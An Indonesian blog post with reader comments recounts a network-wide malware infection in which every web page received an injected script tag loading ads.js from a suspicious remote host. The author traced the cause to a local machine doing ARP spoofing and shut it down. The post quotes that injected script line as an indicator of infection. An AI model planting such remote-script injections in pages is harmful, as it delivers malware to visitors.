Selalu ada script “ads.js”

Tidak begitu populer, script itu selalu muncul ketika buka halaman website baik dari lokal maupun luar. Pada awalnya ketika pake browser Mozilla/Firefox gak ketahuan tapi begitu pake browser InternetExplorer langsung si antivirus teriak-teriak ada trojan/worm.. (kedetect pake McAfee, AVG, Antivira, Avast) namun nggak bisa nge-delete cuman di pindah ke forlder tertentu (Vault kalo pake AVG dan delete manual). Koneksi Internet jadi sangat lambat, dan sering muncul dialog box dari si Antivirus. Aplikasi obrolan juga nggak ketinggalan rewel, setiap kali mau buka obrolan keluar dialog box dari si Antivirus.

Langkah penjejakan, ketika sudah tahu bahwa setiap halaman website selalu ada tambahan script di bagian paling atas <script src=”http://u.asdafdgfgf.com/ads.js”></script&gt;, melalui view source code. Copy script tersebut dan paste di Search engine Google.. tak lama (dalam hitungan detik) tara…. ternyata sudah banyak kasus yang dialami oleh pengguna internet lainnya, salah satunya bisa dilihat di link berikut: http://misbah01.multiply.com/journal/item/110/waspadai_virus_asdafdgfgf.comads.js .

Langkah penyelesaian, file ARProtec (berukuran 2,34 MB) sudah di download dan di instal lalu di amati.. ARProtec menunjukkan ada 4 nomor IP lokal dimana penghitung (counter) selalu bertambah hingga ribuan.. waduh.. No IP suspect di telusuri dan akhirnya memang komputer (dengan No IP suspect terebut) menyala “broadcast” dan akhirnya di shutdown dan di cek lagi di ARProtect tidak menunjukkan aktifitas “broadcast”.. Lalu coba buka halaman website pake Mozilla/Firefox.. tidak ada tanda-tanda apapun lalu pake InternetExplorer juga menunjukkan hal yang sama, aplikasi Obrolan juga demikian. yup kayanya sudah engga kena script injection atau spoofing lagi…

Demikian sekilas pengalaman…

Iklan

8 pemikiran pada “Selalu ada script “ads.js”

  1. Halo,
    kantor saya satu jaringan kena virus ini…saya sdh ke infect juga..salah satunya ngga k bisa buka hotmail. Kalau udah kedeteks komputer yang pakai ip spoofing cara ngilanginya pakai apa ya??

  2. #Wahyu:
    Beberapa antivirus sudah saya coba seperti McAfee, AVG, Antivira, dan PCMAV rc24 dengan update definition paling baru. Beberapa ada yang langsung bisa menghapus dan ada juga yang dipindah ke folder tertentu (seperti pada AVG). Hapus manual juga saya lakukan dengan menggunakan fasilitas search file pada Windows Explorer.

  3. Eitss.. tunggu dulu baik firefox maupun IE dan Opera atau yang lain tetep sama.. indikasinya coba halaman web diliat scriptnya.. (view source).. nah bagian paling atas sendiri biasanya ada script tersebut.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s